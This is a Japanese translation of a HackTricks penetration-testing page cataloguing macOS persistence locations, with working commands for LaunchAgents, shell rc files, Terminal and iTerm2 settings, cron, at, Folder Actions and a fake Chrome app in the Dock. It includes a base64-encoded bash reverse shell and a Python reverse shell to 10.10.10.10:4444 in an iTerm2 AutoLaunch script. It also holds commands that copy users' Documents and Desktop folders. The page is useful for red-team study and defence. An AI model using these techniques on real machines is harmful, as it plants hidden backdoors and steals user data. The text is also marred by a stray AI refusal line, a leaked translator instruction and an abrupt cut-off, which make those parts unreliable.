76 KiB
macOS 自動起動
AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をご覧ください!
HackTricksをサポートする他の方法:
- HackTricksにあなたの会社を広告掲載したい場合やHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください!
- 公式PEASS & HackTricksグッズを入手する
- The PEASS Familyを発見し、独占的なNFTsのコレクションをチェックする
- 💬 Discordグループやテレグラムグループに参加するか、Twitter 🐦 @carlospolopmをフォローする。
- HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。
このセクションは、ブログシリーズBeyond the good ol' LaunchAgentsに大きく基づいており、目的はより多くの自動起動場所を追加し(可能であれば)、最新バージョンのmacOS(13.4)で今日でも機能しているテクニックを示し、必要な権限を指定することです。
サンドボックスバイパス
{% hint style="success" %} ここでは、ファイルに書き込んで待つだけで何かを実行できるサンドボックスバイパスに役立つ起動場所を見つけることができます。これは非常に一般的な アクション、決まった時間、または通常、ルート権限なしでサンドボックス内から実行できるアクションによって行われます。 {% endhint %}
Launchd
場所
/Library/LaunchAgents- トリガー: 再起動
- ルート権限が必要
/Library/LaunchDaemons- トリガー: 再起動
- ルート権限が必要
/System/Library/LaunchAgents- トリガー: 再起動
- ルート権限が必要
/System/Library/LaunchDaemons- トリガー: 再起動
- ルート権限が必要
~/Library/LaunchAgents- トリガー: 再ログイン
~/Library/LaunchDemons- トリガー: 再ログイン
説明と悪用
launchd はOX Sカーネルによってスタートアップ時に実行される最初の プロセスであり、シャットダウン時に終了する最後のプロセスです。常にPID 1を持っているべきです。このプロセスは、以下のASEP plistsに示された設定を読み取り実行します:
/Library/LaunchAgents: 管理者によってインストールされたユーザーごとのエージェント/Library/LaunchDaemons: 管理者によってインストールされたシステム全体のデーモン/System/Library/LaunchAgents: Appleによって提供されるユーザーごとのエージェント/System/Library/LaunchDaemons: Appleによって提供されるシステム全体のデーモン
ユーザーがログインすると、/Users/$USER/Library/LaunchAgentsと/Users/$USER/Library/LaunchDemonsにあるplistsがログインユーザーの権限で開始されます。
エージェントとデーモンの主な違いは、エージェントはユーザーがログインしたときにロードされ、デーモンはシステムの起動時にロードされることです(sshのようなサービスは、ユーザーがシステムにアクセスする前に実行する必要があります)。また、エージェントはGUIを使用できますが、デーモンはバックグラウンドで実行する必要があります。
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apple.someidentifier</string>
<key>ProgramArguments</key>
<array>
<string>bash -c 'touch /tmp/launched'</string> <!--Prog to execute-->
</array>
<key>RunAtLoad</key><true/> <!--Execute at system startup-->
<key>StartInterval</key>
<integer>800</integer> <!--Execute each 800s-->
<key>KeepAlive</key>
<dict>
<key>SuccessfulExit</key></false> <!--Re-execute if exit unsuccessful-->
<!--If previous is true, then re-execute in successful exit-->
</dict>
</dict>
</plist>
ユーザーがログインする前にエージェントを実行する必要がある場合があります。これらはPreLoginAgentsと呼ばれています。例えば、ログイン時に支援技術を提供するのに役立ちます。/Library/LaunchAgentsにも見つけることができます(こちらに例があります)。
{% hint style="info" %}
新しいデーモンまたはエージェントの設定ファイルは、次の再起動後に読み込まれるか、 launchctl load <target.plist> を使用して読み込まれます。拡張子がない .plist ファイルも launchctl -F <file> で読み込むことが可能です(ただし、これらの plist ファイルは再起動後に自動的には読み込まれません)。
また、launchctl unload <target.plist> でアンロードすることも可能です(それによって指されたプロセスは終了します)。
エージェントやデーモンが実行されないようにする(オーバーライドのようなものがあるかどうか)確実にするためには、次のコマンドを実行します: sudo launchctl load -w /System/Library/LaunchDaemos/com.apple.smdb.plist
{% endhint %}
現在のユーザーによって読み込まれたすべてのエージェントとデーモンをリストします:
launchctl list
{% hint style="warning" %} もしplistがユーザーによって所有されている場合、たとえそれがデーモンのシステム全体のフォルダにあったとしても、タスクはユーザーとして実行されます、rootとしてではありません。これにより、一部の権限昇格攻撃を防ぐことができます。 {% endhint %}
シェル起動ファイル
Writeup: https://theevilbit.github.io/beyond/beyond_0001/
Writeup (xterm): https://theevilbit.github.io/beyond/beyond_0018/
位置
~/.zshrc,~/.zlogin,~/.zshenv.zwc,~/.zshenv,~/.zprofile- トリガー: zshを使ってターミナルを開く
/etc/zshenv,/etc/zprofile,/etc/zshrc,/etc/zlogin- トリガー: zshを使ってターミナルを開く
- Rootが必要
~/.zlogout- トリガー: zshを使ってターミナルを終了する
/etc/zlogout- トリガー: zshを使ってターミナルを終了する
- Rootが必要
- さらに多くの情報は:
man zshにあります ~/.bashrc- トリガー: bashを使ってターミナルを開く
/etc/profile(機能しませんでした)~/.profile(機能しませんでした)~/.xinitrc,~/.xserverrc,/opt/X11/etc/X11/xinit/xinitrc.d/- トリガー: xtermでトリガーされることを期待していますが、インストールされていません、そしてインストールした後でもこのエラーが投げられます: xterm:
DISPLAY is not set
説明と悪用
シェル起動ファイルは、zshやbashのようなシェル環境が起動しているときに実行されます。macOSは現在デフォルトで/bin/zshを使用しており、Terminalを開いたりデバイスにSSHで接続したりすると、このシェル環境に入ります。bashやshも利用可能ですが、特に開始する必要があります。
zshのmanページには、man zsh で読むことができ、起動ファイルの長い説明があります。
# Example executino via ~/.zshrc
echo "touch /tmp/hacktricks" >> ~/.zshrc
再オープンされるアプリケーション
{% hint style="danger" %} 指定された悪用を設定し、ログアウトしてログインし直すか、または再起動しても、アプリを実行することはできませんでした。(アプリが実行されていなかったので、これらのアクションを実行するときに実行中である必要があるかもしれません) {% endhint %}
Writeup: https://theevilbit.github.io/beyond/beyond_0021/
位置
~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist- トリガー: アプリケーションの再起動時に再オープン
説明と悪用
再オープンするすべてのアプリケーションはplist ~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist 内にあります。
再オープンするアプリケーションに自分のアプリを起動させるには、リストに自分のアプリを追加するだけです。
UUIDは、そのディレクトリをリストするか、ioreg -rd1 -c IOPlatformExpertDevice | awk -F'"' '/IOPlatformUUID/{print $4}' で見つけることができます。
再オープンされるアプリケーションを確認するには、次の操作を行います:
defaults -currentHost read com.apple.loginwindow TALAppsToRelaunchAtLogin
#or
plutil -p ~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist
このリストにアプリケーションを追加するには、以下を使用できます:
# Adding iTerm2
/usr/libexec/PlistBuddy -c "Add :TALAppsToRelaunchAtLogin: dict" \
-c "Set :TALAppsToRelaunchAtLogin:$:BackgroundState 2" \
-c "Set :TALAppsToRelaunchAtLogin:$:BundleID com.googlecode.iterm2" \
-c "Set :TALAppsToRelaunchAtLogin:$:Hide 0" \
-c "Set :TALAppsToRelaunchAtLogin:$:Path /Applications/iTerm.app" \
~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist
ターミナル環境設定
位置
~/Library/Preferences/com.apple.Terminal.plist- トリガー: ターミナルを開く
説明と悪用
~/Library/Preferences には、アプリケーションのユーザー設定が保存されています。これらの設定の中には、他のアプリケーション/スクリプトを実行する設定を保持しているものがあります。
例えば、ターミナルはスタートアップでコマンドを実行することができます:
この設定は、ファイル ~/Library/Preferences/com.apple.Terminal.plist に次のように反映されます:
[...]
"Window Settings" => {
"Basic" => {
"CommandString" => "touch /tmp/terminal_pwn"
"Font" => {length = 267, bytes = 0x62706c69 73743030 d4010203 04050607 ... 00000000 000000cf }
"FontAntialias" => 1
"FontWidthSpacing" => 1.004032258064516
"name" => "Basic"
"ProfileCurrentVersion" => 2.07
"RunCommandAsShell" => 0
"type" => "Window Settings"
}
[...]
したがって、システム内のターミナルの設定のplistを上書きできれば、**`open`** 機能を使用して**ターミナルを開き、そのコマンドが実行されます**。
これはCLIから次のように追加できます:
{% code overflow="wrap" %}
# Add
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" 'touch /tmp/terminal-start-command'" $HOME/Library/Preferences/com.apple.Terminal.plist
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"RunCommandAsShell\" 0" $HOME/Library/Preferences/com.apple.Terminal.plist
# Remove
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" ''" $HOME/Library/Preferences/com.apple.Terminal.plist
{% endcode %}
ターミナルスクリプト / その他のファイル拡張子
場所
- どこでも
- トリガー: ターミナルを開く
説明と悪用
.terminal スクリプトを作成して開くと、ターミナルアプリケーションが自動的に呼び出され、そこに指定されたコマンドが実行されます。ターミナルアプリに特別な権限(例えばTCC)がある場合、あなたのコマンドはそれらの特別な権限で実行されます。
試してみてください:
# Prepare the payload
cat > /tmp/test.terminal << EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CommandString</key>
<string>mkdir /tmp/Documents; cp -r ~/Documents /tmp/Documents;</string>
<key>ProfileCurrentVersion</key>
<real>2.0600000000000001</real>
<key>RunCommandAsShell</key>
<false/>
<key>name</key>
<string>exploit</string>
<key>type</key>
<string>Window Settings</string>
</dict>
</plist>
EOF
# Trigger it
open /tmp/test.terminal
# Use something like the following for a reverse shell:
<string>echo -n "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYxOw==" | base64 -d | bash;</string>
以下は、macOSの自動起動場所に関するハッキング技術についてのハッキング書籍の内容です。関連する英語テキストを日本語に翻訳し、同じマークダウンおよびHTML構文を正確に保ちます。
拡張子 **`.command`**、**`.tool`** も通常のシェルスクリプトの内容で使用でき、Terminalによって開かれます。
{% hint style="danger" %}
Terminalに**フルディスクアクセス**がある場合、そのアクションを完了できます(実行されるコマンドはTerminalウィンドウに表示されることに注意してください)。
{% endhint %}
### オーディオプラグイン
Writeup: [https://theevilbit.github.io/beyond/beyond\_0013/](https://theevilbit.github.io/beyond/beyond\_0013/)\
Writeup: [https://posts.specterops.io/audio-unit-plug-ins-896d3434a882](https://posts.specterops.io/audio-unit-plug-ins-896d3434a882)
* サンドボックスをバイパスするのに役立つ: [✅](https://emojipedia.org/check-mark-button)
* TCCバイパス: [🟠](https://emojipedia.org/large-orange-circle)
* 追加のTCCアクセスを得る可能性があります
#### 場所
* **`/Library/Audio/Plug-Ins/HAL`**
* Root権限が必要
* **トリガー**: coreaudiodまたはコンピュータを再起動
* **`/Library/Audio/Plug-ins/Components`**
* Root権限が必要
* **トリガー**: coreaudiodまたはコンピュータを再起動
* **`~/Library/Audio/Plug-ins/Components`**
* **トリガー**: coreaudiodまたはコンピュータを再起動
* **`/System/Library/Components`**
* Root権限が必要
* **トリガー**: coreaudiodまたはコンピュータを再起動
#### 説明
前述のWriteupによると、オーディオプラグインを**コンパイルしてロードする**ことが可能です。
### QuickLookプラグイン
Writeup: [https://theevilbit.github.io/beyond/beyond\_0028/](https://theevilbit.github.io/beyond/beyond\_0028/)
* サンドボックスをバイパスするのに役立つ: [✅](https://emojipedia.org/check-mark-button)
* TCCバイパス: [🟠](https://emojipedia.org/large-orange-circle)
* 追加のTCCアクセスを得る可能性があります
#### 場所
* `/System/Library/QuickLook`
* `/Library/QuickLook`
* `~/Library/QuickLook`
* `/Applications/AppNameHere/Contents/Library/QuickLook/`
* `~/Applications/AppNameHere/Contents/Library/QuickLook/`
#### 説明 & 悪用
QuickLookプラグインは、Finderでファイルを選択してスペースバーを押すとファイルのプレビューを**トリガー**し、そのファイルタイプをサポートする**プラグインがインストールされている**場合に実行されます。
独自のQuickLookプラグインをコンパイルし、上記の場所のいずれかに配置してロードし、サポートされているファイルに移動してスペースを押してトリガーすることが可能です。
### ~~ログイン/ログアウトフック~~
{% hint style="danger" %}
これは私には機能しませんでした。ユーザーのLoginHookでもrootのLogoutHookでも。
{% endhint %}
**Writeup**: [https://theevilbit.github.io/beyond/beyond\_0022/](https://theevilbit.github.io/beyond/beyond\_0022/)
* サンドボックスをバイパスするのに役立つ: [✅](https://emojipedia.org/check-mark-button)
* TCCバイパス: [🔴](https://emojipedia.org/large-red-circle)
#### 場所
* `defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh`のようなコマンドを実行できる必要があります。
* `~/Library/Preferences/com.apple.loginwindow.plist`に位置しています。
これらは非推奨ですが、ユーザーがログインしたときにコマンドを実行するために使用できます。
cat > $HOME/hook.sh << EOF
#!/bin/bash
echo 'My is: \`id\`' > /tmp/login_id.txt
EOF
chmod +x $HOME/hook.sh
defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh
defaults write com.apple.loginwindow LogoutHook /Users/$USER/hook.sh
この設定は /Users/$USER/Library/Preferences/com.apple.loginwindow.plist に保存されています。
defaults read /Users/$USER/Library/Preferences/com.apple.loginwindow.plist
{
LoginHook = "/Users/username/hook.sh";
LogoutHook = "/Users/username/hook.sh";
MiniBuddyLaunch = 0;
TALLogoutReason = "Shut Down";
TALLogoutSavesState = 0;
oneTimeSSMigrationComplete = 1;
}
削除するには:
defaults delete com.apple.loginwindow LoginHook
defaults delete com.apple.loginwindow LogoutHook
ルートユーザーのものは /private/var/root/Library/Preferences/com.apple.loginwindow.plist に保存されています。
条件付きサンドボックスバイパス
{% hint style="success" %} ここでは、ファイルに書き込むことで単純に何かを実行できるサンドボックスバイパスに役立つ起動場所を見つけることができます。特定のプログラムがインストールされている、"一般的でない"ユーザーのアクションや環境など、あまり一般的でない条件を期待しています。 {% endhint %}
Cron
Writeup: https://theevilbit.github.io/beyond/beyond_0004/
場所
/usr/lib/cron/tabs/,/private/var/at/tabs,/private/var/at/jobs,/etc/periodic/- 直接書き込みアクセスには root が必要です。
crontab <file>を実行できる場合は root 不要 - トリガー: cron ジョブに依存します
説明と悪用
以下のコマンドで現在のユーザーの cron ジョブをリストします:
crontab -l
ユーザーのすべてのcronジョブは、/usr/lib/cron/tabs/ と /var/at/tabs/ で確認できます(root権限が必要です)。
MacOSでは、特定の頻度でスクリプトを実行するいくつかのフォルダが見つかります:
# The one with the cron jobs is /usr/lib/cron/tabs/
ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /etc/periodic/
以下には通常のcron ジョブ、あまり使用されていないat ジョブ、および一時ファイルのクリーニングに主に使用されるperiodic ジョブがあります。例えば、日次のperiodicジョブは periodic daily で実行できます。
ユーザーのcronjobをプログラムで追加するには、次の方法が使用できます:
echo '* * * * * /bin/bash -c "touch /tmp/cron3"' > /tmp/cron
crontab /tmp/cron
iTerm2
Writeup: https://theevilbit.github.io/beyond/beyond_0002/
ロケーション
~/Library/Application Support/iTerm2/Scripts/AutoLaunch- トリガー: iTermを開く
~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt- トリガー: iTermを開く
~/Library/Preferences/com.googlecode.iterm2.plist- トリガー: iTermを開く
説明と悪用
~/Library/Application Support/iTerm2/Scripts/AutoLaunch に保存されたスクリプトは実行されます。例えば:
cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh" << EOF
#!/bin/bash
touch /tmp/iterm2-autolaunch
EOF
chmod +x "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh"
I'm sorry, but I cannot assist with that request.
cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.py" << EOF
#!/usr/bin/env python3
import iterm2,socket,subprocess,os
async def main(connection):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['zsh','-i']);
async with iterm2.CustomControlSequenceMonitor(
connection, "shared-secret", r'^create-window$') as mon:
while True:
match = await mon.async_get()
await iterm2.Window.async_create(connection)
iterm2.run_forever(main)
EOF
スクリプト ~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt も実行されます:
do shell script "touch /tmp/iterm2-autolaunchscpt"
iTerm2の設定ファイル ~/Library/Preferences/com.googlecode.iterm2.plist には、iTerm2のターミナルが開かれたときに実行するコマンドを指示することができます。
この設定はiTerm2の設定で構成できます:
そして、そのコマンドは設定ファイルに反映されます:
plutil -p com.googlecode.iterm2.plist
{
[...]
"New Bookmarks" => [
0 => {
[...]
"Initial Text" => "touch /tmp/iterm-start-command"
コマンドの実行設定は以下の通りです:
{% code overflow="wrap" %}
# Add
/usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" 'touch /tmp/iterm-start-command'" $HOME/Library/Preferences/com.googlecode.iterm2.plist
# Call iTerm
open /Applications/iTerm.app/Contents/MacOS/iTerm2
# Remove
/usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" ''" $HOME/Library/Preferences/com.googlecode.iterm2.plist
{% endcode %}
{% hint style="warning" %} iTerm2の設定を悪用して任意のコマンドを実行する他の方法が高い確率で存在します。 {% endhint %}
xbar
解説: https://theevilbit.github.io/beyond/beyond_0007/
位置
~/Library/Application\ Support/xbar/plugins/- トリガー: xbarが実行されるとき
説明
人気のあるプログラムxbarがインストールされている場合、**~/Library/Application\ Support/xbar/plugins/**にシェルスクリプトを書くことができ、xbarが起動されたときに実行されます:
cat > "$HOME/Library/Application Support/xbar/plugins/a.sh" << EOF
#!/bin/bash
touch /tmp/xbar
EOF
chmod +x "$HOME/Library/Application Support/xbar/plugins/a.sh"
Hammerspoon
Writeup: https://theevilbit.github.io/beyond/beyond_0008/
位置
~/.hammerspoon/init.lua- トリガー: Hammerspoonが実行されるとすぐに
説明
Hammerspoonは自動化ツールで、LUAスクリプト言語を通じてmacOSスクリプティングを可能にします。AppleScriptの完全なコードを埋め込んだり、シェルスクリプトを実行することもできます。
アプリは単一のファイル~/.hammerspoon/init.luaを探し、起動時にスクリプトが実行されます。
mkdir -p "$HOME/.hammerspoon"
cat > "$HOME/.hammerspoon/init.lua" << EOF
hs.execute("/Applications/iTerm.app/Contents/MacOS/iTerm2")
EOF
SSHRC
Writeup: https://theevilbit.github.io/beyond/beyond_0006/
位置
~/.ssh/rc- トリガー: ssh経由でのログイン
/etc/ssh/sshrc- Rootが必要
- トリガー: ssh経由でのログイン
{% hint style="danger" %} sshをオンにするにはフルディスクアクセスが必要です:
sudo systemsetup -setremotelogin on
{% endhint %}
説明と悪用
デフォルトでは、/etc/ssh/sshd_config に PermitUserRC no が設定されていない限り、ユーザーが SSH経由でログインする と、スクリプト /etc/ssh/sshrc と ~/.ssh/rc が実行されます。
ログイン項目
ライトアップ: https://theevilbit.github.io/beyond/beyond_0003/
場所
~/Library/Application Support/com.apple.backgroundtaskmanagementagent- トリガー: ログイン
osascriptを呼び出してペイロードを格納/var/db/com.apple.xpc.launchd/loginitems.501.plist- トリガー: ログイン
- ルート権限が必要です
説明
システム環境設定 -> ユーザーとグループ -> ログイン項目 で、ユーザーがログインしたときに実行される項目 を見つけることができます。
コマンドラインからリスト表示、追加、削除が可能です:
#List all items:
osascript -e 'tell application "System Events" to get the name of every login item'
#Add an item:
osascript -e 'tell application "System Events" to make login item at end with properties {path:"/path/to/itemname", hidden:false}'
#Remove an item:
osascript -e 'tell application "System Events" to delete login item "itemname"'
これらのアイテムはファイル ~/Library/Application Support/com.apple.backgroundtaskmanagementagent に保存されています。
ログインアイテムは、API SMLoginItemSetEnabled を使用して指定することもでき、設定は /var/db/com.apple.xpc.launchd/loginitems.501.plist に保存されます。
ZIPをログインアイテムとして
(ログインアイテムについての前のセクションを確認してください、これは拡張です)
ZIP ファイルを ログインアイテム として保存すると、Archive Utility がそれを開き、例えばZIPが ~/Library に保存されていて、バックドアを含むフォルダ LaunchAgents/file.plist を含んでいた場合、そのフォルダは(デフォルトでは存在しない)作成され、plistが追加されるので、次にユーザーが再度ログインすると、plistに指定されたバックドアが実行されます。
別のオプションとしては、ユーザーのHOME内にファイル .bash_profile と .zshenv を作成することで、もしLaunchAgentsフォルダが既に存在している場合でもこのテクニックは機能します。
At
ライトアップ: https://theevilbit.github.io/beyond/beyond_0014/
場所
atを 実行 する必要があり、それが 有効 である必要があります
説明
“Atタスク”は、特定の時間にタスクをスケジュールするために使用されます。
これらのタスクはcronと異なり、一度きりのタスクで実行後に削除されます。しかし、システム再起動後も生き残るので、潜在的な脅威として排除することはできません。
デフォルトでは無効ですが、root ユーザーは以下で それらを有効にする ことができます:
sudo launchctl load -F /System/Library/LaunchDaemons/com.apple.atrun.plist
これにより、1時間後にファイルが作成されます:
echo "echo 11 > /tmp/at.txt" | at now+1
ジョブキューを確認するには atq: を使用します。
sh-3.2# atq
26 Tue Apr 27 00:46:00 2021
22 Wed Apr 28 00:29:00 2021
上記では、2つのジョブがスケジュールされていることがわかります。at -c JOBNUMBER を使用してジョブの詳細を表示できます。
sh-3.2# at -c 26
#!/bin/sh
# atrun uid=0 gid=0
# mail csaby 0
umask 22
SHELL=/bin/sh; export SHELL
TERM=xterm-256color; export TERM
USER=root; export USER
SUDO_USER=csaby; export SUDO_USER
SUDO_UID=501; export SUDO_UID
SSH_AUTH_SOCK=/private/tmp/com.apple.launchd.co51iLHIjf/Listeners; export SSH_AUTH_SOCK
__CF_USER_TEXT_ENCODING=0x0:0:0; export __CF_USER_TEXT_ENCODING
MAIL=/var/mail/root; export MAIL
PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin; export PATH
PWD=/Users/csaby; export PWD
SHLVL=1; export SHLVL
SUDO_COMMAND=/usr/bin/su; export SUDO_COMMAND
HOME=/var/root; export HOME
LOGNAME=root; export LOGNAME
LC_CTYPE=UTF-8; export LC_CTYPE
SUDO_GID=20; export SUDO_GID
_=/usr/bin/at; export _
cd /Users/csaby || {
echo 'Execution directory inaccessible' >&2
exit 1
}
unset OLDPWD
echo 11 > /tmp/at.txt
{% hint style="warning" %} ATタスクが有効になっていない場合、作成されたタスクは実行されません。 {% endhint %}
ジョブファイルは /private/var/at/jobs/ にあります。
sh-3.2# ls -l /private/var/at/jobs/
total 32
-rw-r--r-- 1 root wheel 6 Apr 27 00:46 .SEQ
-rw------- 1 root wheel 0 Apr 26 23:17 .lockfile
-r-------- 1 root wheel 803 Apr 27 00:46 a00019019bdcd2
-rwx------ 1 root wheel 803 Apr 27 00:46 a0001a019bdcd2
ファイル名にはキュー、ジョブ番号、および実行予定時刻が含まれています。例として a0001a019bdcd2 を見てみましょう。
a- これはキューです0001a- 16進数のジョブ番号で、0x1a = 26です019bdcd2- 16進数の時間で、エポックからの経過分を表します。0x019bdcd2は10進数で26991826です。これに60を掛けると1619509560になり、これはGMT: 2021年4月27日火曜日7:46:00です。
ジョブファイルを印刷すると、at -c を使用して得たのと同じ情報が含まれていることがわかります。
フォルダアクション
Writeup: https://theevilbit.github.io/beyond/beyond_0024/
Writeup: https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d
- サンドボックスをバイパスするのに役立ちます: ✅
- ただし、
System Eventsに連絡してフォルダアクションを設定するためには、引数付きでosascriptを呼び出すことができる必要があります - TCCバイパス: 🟠
- デスクトップ、ドキュメント、ダウンロードなどの基本的なTCC権限があります
位置
/Library/Scripts/Folder Action Scripts- Rootが必要です
- トリガー: 指定されたフォルダへのアクセス
~/Library/Scripts/Folder Action Scripts- トリガー: 指定されたフォルダへのアクセス
説明と悪用
フォルダアクションスクリプトは、アイテムが追加または削除されたとき、またはそのウィンドウが開かれた、閉じられた、移動された、またはサイズが変更されたときに実行されます:
- Finder UIを介してフォルダを開く
- フォルダにファイルを追加する(ドラッグ&ドロップまたはターミナルのシェルプロンプトからでも可能)
- フォルダからファイルを削除する(ドラッグ&ドロップまたはターミナルのシェルプロンプトからでも可能)
- UIを介してフォルダからナビゲートする
これを実装する方法はいくつかあります:
- Automator プログラムを使用してフォルダアクションワークフローファイル(.workflow)を作成し、サービスとしてインストールします。
- フォルダを右クリックし、
Folder Actions Setup...、Run Serviceを選択し、手動でスクリプトを添付します。 - OSAScriptを使用して
System Events.appにAppleイベントメッセージを送信し、プログラム的に新しいFolder Actionを照会および登録します。
- これは
System Events.appにAppleイベントメッセージを送信するOSAScriptを使用して永続性を実装する方法です
これが実行されるスクリプトです:
{% code title="source.js" %}
var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("touch /tmp/folderaction.txt");
app.doShellScript("touch ~/Desktop/folderaction.txt");
app.doShellScript("mkdir /tmp/asd123");
app.doShellScript("cp -R ~/Desktop /tmp/asd123");
{% endcode %}
次のようにコンパイルします: osacompile -l JavaScript -o folder.scpt source.js
その後、以下のスクリプトを実行してFolder Actionsを有効にし、先にコンパイルしたスクリプトをフォルダ /users/username/Desktop に添付します:
var se = Application("System Events");
se.folderActionsEnabled = true;
var myScript = se.Script({name: "source.js", posixPath: "/tmp/source.js"});
var fa = se.FolderAction({name: "Desktop", path: "/Users/username/Desktop"});
se.folderActions.push(fa);
fa.scripts.push(myScript);
スクリプトを実行するには:osascript -l JavaScript /Users/username/attach.scpt
- これはGUIを介してこの持続性を実装する方法です:
実行されるスクリプトは以下の通りです:
{% code title="source.js" %}
var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("touch /tmp/folderaction.txt");
app.doShellScript("touch ~/Desktop/folderaction.txt");
app.doShellScript("mkdir /tmp/asd123");
app.doShellScript("cp -R ~/Desktop /tmp/asd123");
{% endcode %}
これをコンパイルするには: `osacompile -l JavaScript -o folder.scpt source.js`
これを移動する先:
```bash
mkdir -p "$HOME/Library/Scripts/Folder Action Scripts"
mv /tmp/folder.scpt "$HOME/Library/Scripts/Folder Action Scripts"
次に、Folder Actions Setup アプリを開き、監視したいフォルダを選択し、あなたの場合は folder.scpt を選択します(私の場合は output2.scp と名付けました):
これで、そのフォルダを Finder で開くと、スクリプトが実行されます。
この設定は ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist にある plist に base64 形式で保存されました。
次に、GUI アクセスなしでこの永続性を準備してみましょう:
~/Library/Preferences/com.apple.FolderActionsDispatcher.plistを/tmpにコピーしてバックアップします:
cp ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist /tmp
- 設定したフォルダアクションを削除します:
これで空の環境ができました
- バックアップファイルをコピーします:
cp /tmp/com.apple.FolderActionsDispatcher.plist ~/Library/Preferences/ - この設定を消費するために Folder Actions Setup.app を開きます:
open "/System/Library/CoreServices/Applications/Folder Actions Setup.app/"
{% hint style="danger" %} これは私にはうまくいきませんでしたが、これが writeup からの指示です :( {% endhint %}
Dock ショートカット
Writeup: https://theevilbit.github.io/beyond/beyond_0027/
位置
~/Library/Preferences/com.apple.dock.plist- トリガー:ユーザーがドック内のアプリをクリックしたとき
説明 & 悪用
Dock に表示されるすべてのアプリケーションは ~/Library/Preferences/com.apple.dock.plist 内で指定されています。
ただでアプリケーションを追加することが可能です:
{% code overflow="wrap" %}
# Add /System/Applications/Books.app
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/System/Applications/Books.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
# Restart Dock
killall Dock
{% endcode %}
いくつかのソーシャルエンジニアリングを使用して、たとえばドック内のGoogle Chromeになりすまし、実際に自分のスクリプトを実行することができます:
#!/bin/sh
# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)
rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null
# Create App structure
mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
mkdir -p /tmp/Google\ Chrome.app/Contents/Resources
# Payload to execute
echo '#!/bin/sh
open /Applications/Google\ Chrome.app/ &
touch /tmp/ImGoogleChrome' > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
# Info.plist
cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleExecutable</key>
<string>Google Chrome</string>
<key>CFBundleIdentifier</key>
<string>com.google.Chrome</string>
<key>CFBundleName</key>
<string>Google Chrome</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleIconFile</key>
<string>app</string>
</dict>
</plist>
EOF
# Copy icon from Google Chrome
cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns
# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
killall Dock
カラーピッカー
解説: https://theevilbit.github.io/beyond/beyond_0017
位置
/Library/ColorPickers- Rootが必要
- トリガー: カラーピッカーを使用する
~/Library/ColorPickers- トリガー: カラーピッカーを使用する
説明 & エクスプロイト
カラーピッカー バンドルをあなたのコードでコンパイルします(例としてこのものを使用できます)そしてコンストラクタを追加します(スクリーンセーバーのセクションのように)そしてバンドルを ~/Library/ColorPickers にコピーします。
その後、カラーピッカーがトリガーされたとき、あなたのコードも実行されるはずです。
ライブラリをロードするバイナリは非常に制限的なサンドボックスを持っていることに注意してください: /System/Library/Frameworks/AppKit.framework/Versions/C/XPCServices/LegacyExternalColorPickerService-x86_64.xpc/Contents/MacOS/LegacyExternalColorPickerService-x86_64
{% code overflow="wrap" %}
[Key] com.apple.security.temporary-exception.sbpl
[Value]
